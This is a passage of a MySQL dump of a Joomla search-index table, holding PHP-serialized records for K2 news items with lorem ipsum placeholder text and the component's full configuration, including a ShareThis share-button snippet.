News\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:83:\"2:a-night-of-dido-drama-and-dinner-nsectetur-adipisicing-elit-sed-do-eiusmod-tempor\";s:7:\"catslug\";s:13:\"1:latest-news\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:4:\"item\";s:4:\"path\";s:117:\"index.php/lankytini-objektai/item/2-a-night-of-dido-drama-and-dinner-nsectetur-adipisicing-elit-sed-do-eiusmod-tempor\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"K2 Item\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"K2 Item\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:11:\"K2 Category\";a:1:{s:11:\"Latest News\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:11:\"Latest News\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:38:\"index.php?option=com_k2&view=item&id=2\";s:5:\"route\";s:131:\"index.php?option=com_k2&view=item&id=2:a-night-of-dido-drama-and-dinner-nsectetur-adipisicing-elit-sed-do-eiusmod-tempor&Itemid=290\";s:5:\"title\";s:85:\"A night of Dido, drama, and dinner nsectetur adipisicing elit, sed do eiusmod tempor.\";s:11:\"description\";s:543:\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.\";s:9:\"published\";N;s:5:\"state\";i:0;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2013-09-25 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2013-10-04 00:00:00\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:1;}'),(4,'index.php?option=com_k2&view=item&id=3','index.php?option=com_k2&view=item&id=3:university-celebrates-oxford-open-doors-2013-adipisicing-elit-sed-do-eiusmod-tempor&Itemid=290','University celebrates Oxford Open Doors 2013 adipisicing elit sed do eiusmod tempor','Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea c','2025-02-12 13:16:37','6365d6e49c0f9e6f2be9f3aeeefeaf8e',1,1,1,'*','2013-09-25 00:00:00','0000-00-00 00:00:00','2013-08-13 00:00:00','0000-00-00 00:00:00',0,0,1,_binary 'O:19:\"FinderIndexerResult\":18:{s:11:\"\0*\0elements\";a:25:{s:2:\"id\";s:1:\"3\";s:5:\"alias\";s:83:\"university-celebrates-oxford-open-doors-2013-adipisicing-elit-sed-do-eiusmod-tempor\";s:7:\"summary\";s:550:\"<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.</p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:1:\"1\";s:10:\"created_by\";s:3:\"135\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2013-10-07 09:13:14\";s:11:\"modified_by\";s:3:\"135\";s:6:\"params\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":155:{s:10:\"enable_css\";s:1:\"1\";s:14:\"jQueryHandling\";s:5:\"1.8.3\";s:21:\"backendJQueryHandling\";s:6:\"remote\";s:8:\"userName\";s:1:\"1\";s:9:\"userImage\";s:1:\"1\";s:15:\"userDescription\";s:1:\"1\";s:7:\"userURL\";s:1:\"1\";s:9:\"userEmail\";s:1:\"0\";s:12:\"userFeedLink\";s:1:\"1\";s:12:\"userFeedIcon\";s:1:\"1\";s:13:\"userItemCount\";s:2:\"10\";s:13:\"userItemTitle\";s:1:\"1\";s:19:\"userItemTitleLinked\";s:1:\"1\";s:19:\"userItemDateCreated\";s:1:\"1\";s:13:\"userItemImage\";s:1:\"1\";s:17:\"userItemIntroText\";s:1:\"1\";s:16:\"userItemCategory\";s:1:\"1\";s:12:\"userItemTags\";s:1:\"1\";s:22:\"userItemCommentsAnchor\";s:1:\"1\";s:16:\"userItemReadMore\";s:1:\"1\";s:17:\"userItemK2Plugins\";s:1:\"1\";s:12:\"tagItemCount\";s:2:\"10\";s:12:\"tagItemTitle\";s:1:\"1\";s:18:\"tagItemTitleLinked\";s:1:\"1\";s:18:\"tagItemDateCreated\";s:1:\"1\";s:12:\"tagItemImage\";s:1:\"1\";s:16:\"tagItemIntroText\";s:1:\"1\";s:15:\"tagItemCategory\";s:1:\"1\";s:15:\"tagItemReadMore\";s:1:\"1\";s:18:\"tagItemExtraFields\";s:1:\"0\";s:11:\"tagOrdering\";s:0:\"\";s:11:\"tagFeedLink\";s:1:\"1\";s:11:\"tagFeedIcon\";s:1:\"1\";s:16:\"genericItemCount\";s:2:\"10\";s:16:\"genericItemTitle\";s:1:\"1\";s:22:\"genericItemTitleLinked\";s:1:\"1\";s:22:\"genericItemDateCreated\";s:1:\"1\";s:16:\"genericItemImage\";s:1:\"1\";s:20:\"genericItemIntroText\";s:1:\"1\";s:19:\"genericItemCategory\";s:1:\"1\";s:19:\"genericItemReadMore\";s:1:\"1\";s:22:\"genericItemExtraFields\";s:1:\"0\";s:15:\"genericFeedLink\";s:1:\"1\";s:15:\"genericFeedIcon\";s:1:\"1\";s:9:\"feedLimit\";s:2:\"10\";s:13:\"feedItemImage\";s:1:\"1\";s:11:\"feedImgSize\";s:1:\"S\";s:17:\"feedItemIntroText\";s:1:\"1\";s:17:\"feedTextWordLimit\";s:0:\"\";s:16:\"feedItemFullText\";s:1:\"1\";s:12:\"feedItemTags\";s:1:\"0\";s:13:\"feedItemVideo\";s:1:\"0\";s:15:\"feedItemGallery\";s:1:\"0\";s:19:\"feedItemAttachments\";s:1:\"0\";s:14:\"feedBogusEmail\";s:0:\"\";s:16:\"introTextCleanup\";s:1:\"0\";s:27:\"introTextCleanupExcludeTags\";s:0:\"\";s:23:\"introTextCleanupTagAttr\";s:0:\"\";s:15:\"fullTextCleanup\";s:1:\"0\";s:26:\"fullTextCleanupExcludeTags\";s:0:\"\";s:22:\"fullTextCleanupTagAttr\";s:0:\"\";s:12:\"xssFiltering\";s:1:\"0\";s:14:\"linkPopupWidth\";s:3:\"900\";s:15:\"linkPopupHeight\";s:3:\"600\";s:13:\"imagesQuality\";s:3:\"100\";s:11:\"itemImageXS\";s:3:\"100\";s:10:\"itemImageS\";s:3:\"200\";s:10:\"itemImageM\";s:3:\"400\";s:10:\"itemImageL\";s:3:\"870\";s:11:\"itemImageXL\";s:3:\"900\";s:16:\"itemImageGeneric\";s:3:\"350\";s:13:\"catImageWidth\";s:3:\"100\";s:15:\"catImageDefault\";s:1:\"1\";s:14:\"userImageWidth\";s:3:\"100\";s:16:\"userImageDefault\";s:1:\"1\";s:17:\"commenterImgWidth\";s:2:\"48\";s:17:\"onlineImageEditor\";s:8:\"splashup\";s:14:\"imageTimestamp\";s:1:\"0\";s:16:\"imageMemoryLimit\";s:0:\"\";s:16:\"socialButtonCode\";s:708:\"<script type=\"text/javascript\" src=\"http://w.sharethis.com/button/buttons.js\"></script>\r\n<script type=\"text/javascript\">stLight.options({publisher: \"ur-c64aa0b1-b15d-c411-f5fd-ee8e97f0f64d\"}); </script>\r\n\r\n<div style=\"padding:20px 0\" class=\"social-share\">\r\n<span class=\'st_facebook_vcount\' displayText=\'Facebook\'></span>\r\n<span class=\'st_twitter_vcount\' displayText=\'Tweet\'></span>\r\n<span class=\'st_googleplus_vcount\' displayText=\'+1\'></span>\r\n<span class=\'st_linkedin_vcount\' displayText=\'LinkedIn\'></span>\r\n<span class=\'st_pinterest_vcount\' displayText=\'Pinterest\'></span>\r\n<span class=\'st_email_vcount\' displayText=\'Email\'></span>\r\n<span class=\'st_sharethis_vcount\' displayText=\'ShareThis\'></span>\r\n</div>\";s:15:\"twitterUsername\";s:0:\"\";s:13:\"facebookImage\";s:6:\"Medium\";s:8:\"comments\";s:1:\"1\";s:16:\"commentsOrdering\";s:4:\"DESC\";s:13:\"commentsLimit\";s:2:\"10\";s:20:\"commentsFormPosition\";s:5:\"below\";s:18:\"commentsPublishing\";s:1:\"1\";s:17:\"commentsReporting\";s:1:\"2\";s:23:\"commentsReportRecipient\";s:0:\"\";s:24:\"inlineCommentsModeration\";s:1:\"0\";s:8:\"gravatar\";s:1:\"1\";s:8:\"antispam\";s:1:\"0\";s:22:\"recaptchaForRegistered\";s:1:\"1\";s:20:\"akismetForRegistered\";s:1:\"1\";s:17:\"commentsFormNotes\";s:1:\"1\";s:21:\"commentsFormNotesText\";s:0:\"\";s:15:\"frontendEditing\";s:1:\"1\";s:12:\"showImageTab\";s:1:\"1\";s:19:\"showImageGalleryTab\";s:1:\"1\";s:12:\"showVideoTab\";s:1:\"1\";s:18:\"showExtraFieldsTab\";s:1:\"1\";s:18:\"showAttachmentsTab\";s:1:\"1\";s:13:\"showK2Plugins\";s:1:\"1\";s:22:\"sideBarDisplayFrontend\";s:1:\"0\";s:12:\"mergeEditors\";s:1:\"1\";s:14:\"sideBarDisplay\";s:1:\"1\";s:17:\"attachmentsFolder\";s:0:\"\";s:16:\"hideImportButton\";s:1:\"1\";s:12:\"googleSearch\";s:1:\"0\";s:21:\"googleSearchContainer\";s:23:\"k2GoogleSearchContainer\";s:13:\"K2UserProfile\";s:1:\"0\";s:8:\"redirect\";s:0:\"\";s:11:\"adminSearch\";s:6:\"simple\";s:12:\"cookieDomain\";s:0:\"\";s:13:\"taggingSystem\";s:1:\"1\";s:8:\"lockTags\";s:1:\"0\";s:13:\"showTagFilter\";s:1:\"0\";s:9:\"k2TagNorm\";s:1:\"0\";s:13:\"k2TagNormCase\";s:5:\"lower\";s:31:\"k2TagNormAdditionalReplacements\";s:0:\"\";s:20:\"recaptcha_public_key\";s:0:\"\";s:21:\"recaptcha_private_key\";s:0:\"\";s:15:\"recaptcha_theme\";s:5:\"clean\";s:23:\"recaptchaOnRegistration\";s:1:\"0\";s:13:\"akismetApiKey\";s:0:\"\";s:13:\"stopForumSpam\";s:1:\"0\";s:19:\"stopForumSpamApiKey\";s:0:\"\";s:21:\"showItemsCounterAdmin\";s:1:\"1\";s:17:\"showChildCatItems\";s:1:\"1\";s:22:\"disableCompactOrdering\";s:1:\"0\";s:13:\"metaDescLimit\";s:3:\"150\";s:22:\"enforceSEFReplacements\";s:1:\"0\";s:15:\"SEFReplacements\";s:2768:\"À|A, Á|A, Â|A, Ã|A, Ä|A, Å|A, à|a, á|a, â|a, ã|a, ä|a, å|a, Ā|A, ā|a, Ă|A, ă|a, Ą|A, ą|a, Ç|C, ç|c, Ć|C, ć|c, Ĉ|C, ĉ|c, Ċ|C, ċ|c, Č|C, č|c, Ð|D, ð|d, Ď|D, ď|d, Đ|D, đ|d, È|E, É|E, Ê|E, Ë|E, è|e, é|e, ê|e, ë|e, Ē|E, ē|e, Ĕ|E, ĕ|e, Ė|E, ė|e, Ę|E, ę|e, Ě|E, ě|e, Ĝ|G, ĝ|g, Ğ|G, ğ|g, Ġ|G, ġ|g, Ģ|G, ģ|g, Ĥ|H, ĥ|h, Ħ|H, ħ|h, Ì|I, Í|I, Î|I, Ï|I, ì|i, í|i, î|i, ï|i, Ĩ|I, ĩ|i, Ī|I, ī|i, Ĭ|I, ĭ|i, Į|I, į|i, İ|I, ı|i, Ĵ|J, ĵ|j, Ķ|K, ķ|k, ĸ|k, Ĺ|L, ĺ|l, Ļ|L, ļ|l, Ľ|L, ľ|l, Ŀ|L, ŀ|l, Ł|L, ł|l, Ñ|N, ñ|n, Ń|N, ń|n, Ņ|N, ņ|n, Ň|N, ň|n, ŉ|n, Ŋ|N, ŋ|n, Ò|O, Ó|O, Ô|O, Õ|O, Ö|O, Ø|O, ò|o, ó|o, ô|o, õ|o, ö|o, ø|o, Ō|O, ō|o, Ŏ|O, ŏ|o, Ő|O, ő|o, Ŕ|R, ŕ|r, Ŗ|R, ŗ|r, Ř|R, ř|r, Ś|S, ś|s, Ŝ|S, ŝ|s, Ş|S, ş|s, Š|S, š|s, ſ|s, Ţ|T, ţ|t, Ť|T, ť|t, Ŧ|T, ŧ|t, Ù|U, Ú|U, Û|U, Ü|U, ù|u, ú|u, û|u, ü|u, Ũ|U, ũ|u, Ū|U, ū|u, Ŭ|U, ŭ|u, Ů|U, ů|u, Ű|U, ű|u, Ų|U, ų|u, Ŵ|W, ŵ|w, Ý|Y, ý|y, ÿ|y, Ŷ|Y, ŷ|y, Ÿ|Y, Ź|Z, ź|z, Ż|Z, ż|z, Ž|Z, ž|z, α|a, β|b, γ|g, δ|d, ε|e, ζ|z, η|h, θ|th, ι|i, κ|k, λ|l, μ|m, ν|n, ξ|x, ο|o, π|p, ρ|r, σ|s, τ|t, υ|y, φ|f, χ|ch, ψ|ps, ω|w, Α|A, Β|B, Γ|G, Δ|D, Ε|E, Ζ|Z, Η|H, Θ|Th, Ι|I, Κ|K, Λ|L, Μ|M, Ξ|X, Ο|O, Π|P, Ρ|R, Σ|S, Τ|T, Υ|Y, Φ|F, Χ|Ch, Ψ|Ps, Ω|W, ά|a, έ|e, ή|h, ί|i, ό|o, ύ|y, ώ|w, Ά|A, Έ|E, Ή|H, Ί|I, Ό|O, Ύ|Y, Ώ|W, ϊ|i, ΐ|i, ϋ|y, ς|s, А|A, Ӑ|A, Ӓ|A, Ә|E, Ӛ|E, Ӕ|E, Б|B, В|V, Г|G, Ґ|G, Ѓ|G, Ғ|G, Ӷ|G, y|Y, Д|D, Е|E, Ѐ|E, Ё|YO, Ӗ|E, Ҽ|E, Ҿ|E, Є|YE, Ж|ZH, Ӂ|DZH, Җ|ZH, Ӝ|DZH, З|Z, Ҙ|Z, Ӟ|DZ, Ӡ|DZ, Ѕ|DZ, И|I, Ѝ|I, Ӥ|I, Ӣ|I, І|I, Ї|JI, Ӏ|I, Й|Y, Ҋ|Y, Ј|J, К|K, Қ|Q, Ҟ|Q, Ҡ|K, Ӄ|Q, Ҝ|K, Л|L, Ӆ|L, Љ|L, М|M, Ӎ|M, Н|N, Ӊ|N, Ң|N, Ӈ|N, Ҥ|N, Њ|N, О|O, Ӧ|O, Ө|O, Ӫ|O, Ҩ|O, П|P, Ҧ|PF, Р|P, Ҏ|P, С|S, Ҫ|S, Т|T, Ҭ|TH, Ћ|T, Ќ|K, У|U, Ў|U, Ӳ|U, Ӱ|U, Ӯ|U, Ү|U, Ұ|U, Ф|F, Х|H, Ҳ|H, Һ|H, Ц|TS, Ҵ|TS, Ч|CH, Ӵ|CH, Ҷ|CH, Ӌ|CH, Ҹ|CH, Џ|DZ, Ш|SH, Щ|SHT, Ъ|A, Ы|Y, Ӹ|Y, Ь|Y, Ҍ|Y, Э|E, Ӭ|E, Ю|YU, Я|YA, а|a, ӑ|a, ӓ|a, ә|e, ӛ|e, ӕ|e, б|b, в|v, г|g, ґ|g, ѓ|g, ғ|g, ӷ|g, y|y, д|d, е|e, ѐ|e, ё|yo, ӗ|e, ҽ|e, ҿ|e, є|ye, ж|zh, ӂ|dzh, җ|zh, ӝ|dzh, з|z, ҙ|z, ӟ|dz, ӡ|dz, ѕ|dz, и|i, ѝ|i, ӥ|i, ӣ|i, і|i, ї|ji, Ӏ|i, й|y, ҋ|y, ј|j, к|k, қ|q, ҟ|q, ҡ|k, ӄ|q, ҝ|k, л|l, ӆ|l, љ|l, м|m, ӎ|m, н|n, ӊ|n, ң|n, ӈ|n, ҥ|n, њ|n, о|o, ӧ|o, ө|o, ӫ|o, ҩ|o, п|p, ҧ|pf, р|p, ҏ|p, с|s, ҫ|s, т|t, ҭ|th, ћ|t, ќ|k, у|u, ў|u, ӳ|u, ӱ|u, ӯ|u, ү|u, ұ|u, ф|f, х|h, ҳ|h, һ|h, ц|ts, ҵ|ts, ч|ch, ӵ|ch, ҷ|ch, ӌ|ch, ҹ|ch, џ|dz, ш|sh, щ|sht, ъ|a, ы|y, ӹ|y, ь|y, ҍ|y, э|e, ӭ|e, ю|yu, я|ya\";s:5:\"k2Sef\";s:1:\"0\";s:13:\"k2SefLabelCat\";s:7:\"content\";s:13:\"k2SefLabelTag\";s:3:\"tag\";s:14:\"k2SefLabelUser\";s:6:\"author\";s:16:\"k2SefLabelSearch\";s:6:\"search\";s:14:\"k2SefLabelDate\";s:4:\"date\";s:14:\"k2SefLabelItem\";s:1:\"0\";s:26:\"k2SefLabelItemCustomPrefix\";s:0:\"\";s:17:\"k2SefInsertItemId\";s:1:\"1\";s:24:\"k2SefItemIdTitleAliasSep\";s:4:\"dash\";s:22:\"k2SefUseItemTitleAlias\";s:1:\"1\";s:16:\"k2SefInsertCatId\";s:1:\"1\";s:23:\"k2SefCatIdTitleAliasSep\";s:4:\"dash\";s:21:\"k2SefUseCatTitleAlias\";s:1:\"1\";s:16:\"sh404SefLabelCat\";s:0:\"\";s:17:\"sh404SefLabelUser\";s:4:\"blog\";s:17:\"sh404SefLabelItem\";s:1:\"2\";s:18:\"sh404SefTitleAlias\";s:5:\"alias\";s:29:\"sh404SefModK2ContentFeedAlias\";s:4:\"feed\";s:20:\"sh404SefInsertItemId\";s:1:\"0\";s:26:\"sh404SefInsertUniqueItemId\";s:1:\"0\";s:13:\"cbIntegration\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":2:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";}}s:8:\"ordering\";s:1:\"3\";s:5:\"trash\";s:1:\"1\";s:9:\"cat_trash\";s:1:\"0\";s:8:\"category\";s:11:\"Latest News\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:85:\"3:university-celebrates-oxford-open-doors-2013-adipisicing-elit-sed-do-eiusmod-tempor\";s:7:\"catslug\";s:13:\"1:latest-news\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:4:\"item\";s:4:\"path\";s:119:\"index.php/lankytini-objektai/item/3-university-celebrates-oxford-open-doors-2013-adipisicing-elit-sed-do-eiusmod-tempor\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"K2 Item\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"K2 Item\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:11:\"K2 Category\";a:1:{s:11:\"Latest News\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:11:\"Latest News\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:38:\"index.php?option=com_k2&view=item&id=3\";s:5:\"route\";s:133:\"index.php?option=com_k2&view=item&id=3:university-celebrates-oxford-open-doors-2013-adipisicing-elit-sed-do-eiusmod-tempor&Itemid=290\";s:5:\"title\";s:83:\"University celebrates Oxford Open Doors 2013 adipisicing elit sed do eiusmod tempor\";s:11:\"description\";s:543:\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.\";s:9:\"published\";N;s:5:\"state\";i:0;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2013-09-25 00:00:00\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2013-08-13 00:00:00\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:1;}'),(5,'index.php?option=com_k2&view=item&id=4','index.php?option=com_k2&view=item&id=4:oxford-s-part-in-a-new-multiple-sclerosis-drug-adipisicing-elit-sed-do-eiusmod-tempor&Itemid=290','Oxford\'s part in a new multiple sclerosis drug  adipisicing elit sed do eiusmod tempor','Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea c','2025-02-12 13:16:37','5f4222098a3c59bae5fe888cf3d6fe06',1,1,1,'*','2013-09-25 00:00:00','0000-00-00 00:00:00','2013-10-24 00:00:00','0000-00-00 00:00:00',0,0,1,_binary 'O:19:\"FinderIndexerResult\":18:{s:11:\"\0*\0elements\";a:25:{s:2:\"id\";s:1:\"4\";s:5:\"alias\";s:85:\"oxford-s-part-in-a-new-multiple-sclerosis-drug-adipisicing-elit-sed-do-eiusmod-tempor\";s:7:\"summary\";s:550:\"<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.</p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:1:\"1\";s:10:\"created_by\";s:3:\"135\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2013-10-07 09:12:50\";s:11:\"modified_by\";s:3:\"135\";s:6:\"params\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":155:{s:10:\"enable_css\";s:1:\"1\";s:14:\"jQueryHandling\";s:5:\"1.8.3\";s:21:\"backendJQueryHandling\";s:6:\"remote\";s:8:\"userName\";s:1:\"1\";s:9:\"userImage\";s:1:\"1\";s:15:\"userDescription\";s:1:\"1\";s:7:\"userURL\";s:1:\"1\";s:9:\"userEmail\";s:1:\"0\";s:12:\"userFeedLink\";s:1:\"1\";s:12:\"userFeedIcon\";s:1:\"1\";s:13:\"userItemCount\";s:2:\"10\";s:13:\"userItemTitle\";s:1:\"1\";s:19:\"userItemTitleLinked\";s:1:\"1\";s:19:\"userItemDateCreated\";s:1:\"1\";s:13:\"userItemImage\";s:1:\"1\";s:17:\"userItemIntroText\";s:1:\"1\";s:16:\"userItemCategory\";s:1:\"1\";s:12:\"userItemTags\";s:1:\"1\";s:22:\"userItemCommentsAnchor\";s:1:\"1\";s:16:\"userItemReadMore\";s:1:\"1\";s:17:\"userItemK2Plugins\";s:1:\"1\";s:12:\"tagItemCount\";s:2:\"10\";s:12:\"tagItemTitle\";s:1:\"1\";s:18:\"tagItemTitleLinked\";s:1:\"1\";s:18:\"tagItemDateCreated\";s:1:\"1\";s:12:\"tagItemImage\";s:1:\"1\";s:16:\"tagItemIntroText\";s:1:\"1\";s:15:\"tagItemCategory\";s:1:\"1\";s:15:\"tagItemReadMore\";s:1:\"1\";s:18:\"tagItemExtraFields\";s:1:\"0\";s:11:\"tagOrdering\";s:0:\"\";s:11:\"tagFeedLink\";s:1:\"1\";s:11:\"tagFeedIcon\";s:1:\"1\";s:16:\"genericItemCount\";s:2:\"10\";s:16:\"genericItemTitle\";s:1:\"1\";s:22:\"genericItemTitleLinked\";s:1:\"1\";s:22:\"genericItemDateCreated\";s:1:\"1\";s:16:\"genericItemImage\";s:1:\"1\";s:20:\"genericItemIntroText\";s:1:\"1\";s:19:\"genericItemCategory\";s:1:\"1\";s:19:\"genericItemReadMore\";s:1:\"1\";s:22:\"genericItemExtraFields\";s:1:\"0\";s:15:\"genericFeedLink\";s:1:\"1\";s:15:\"genericFeedIcon\";s:1:\"1\";s:9:\"feedLimit\";s:2:\"10\";s:13:\"feedItemImage\";s:1:\"1\";s:11:\"feedImgSize\";s:1:\"S\";s:17:\"feedItemIntroText\";s:1:\"1\";s:17:\"feedTextWordLimit\";s:0:\"\";s:16:\"feedItemFullText\";s:1:\"1\";s:12:\"feedItemTags\";s:1:\"0\";s:13:\"feedItemVideo\";s:1:\"0\";s:15:\"feedItemGallery\";s:1:\"0\";s:19:\"feedItemAttachments\";s:1:\"0\";s:14:\"feedBogusEmail\";s:0:\"\";s:16:\"introTextCleanup\";s:1:\"0\";s:27:\"introTextCleanupExcludeTags\";s:0:\"\";s:23:\"introTextCleanupTagAttr\";s:0:\"\";s:15:\"fullTextCleanup\";s:1:\"0\";s:26:\"fullTextCleanupExcludeTags\";s:0:\"\";s:22:\"fullTextCleanupTagAttr\";s:0:\"\";s:12:\"xssFiltering\";s:1:\"0\";s:14:\"linkPopupWidth\";s:3:\"900\";s:15:\"linkPopupHeight\";s:3:\"600\";s:13:\"imagesQuality\";s:3:\"100\";s:11:\"itemImageXS\";s:3:\"100\";s:10:\"itemImageS\";s:3:\"200\";s:10:\"itemImageM\";s:3:\"400\";s:10:\"itemImageL\";s:3:\"870\";s:11:\"itemImageXL\";s:3:\"900\";s:16:\"itemImageGeneric\";s:3:\"350\";s:13:\"catImageWidth\";s:3:\"100\";s:15:\"catImageDefault\";s:1:\"1\";s:14:\"userImageWidth\";s:3:\"100\";s:16:\"userImageDefault\";s:1:\"1\";s:17:\"commenterImgWidth\";s:2:\"48\";s:17:\"onlineImageEditor\";s:8:\"splashup\";s:14:\"imageTimestamp\";s:1:\"0\";s:16:\"imageMemoryLimit\";s:0:\"\";s:16:\"socialButtonCode\";s:708:\"<script type=\"text/javascript\" src=\"http://w.sharethis.com/button/buttons.js\"></script>\r\n<script type=\"text/javascript\">stLight.options({publisher: \"ur-c64aa0b1-b15d-c411-f5fd-ee8e97f0f64d\"}); </script>\r\n\r\n<div style=\"padding:20px 0\" class=\"social-share\">\r\n<span class=\'st_facebook_vcount\' displayText=\'Facebook\'></span>\r\n<span class=\'st_twitter_vcount\' displayText=\'Tweet\'></span>\r\n<span class=\'st_googleplus_vcount\' displayText=\'+1\'></span>\r\n<span class=\'st_linkedin_vcount\' displayText=\'LinkedIn\'></span>\r\n<span class=\'st_pinterest_vcount\' displayText=\'Pinterest\'></span>\r\n<span class=\'st_email_vcount\' displayText=\'Email\'></span>\r\n<span class=\'st_sharethis_vcount\' 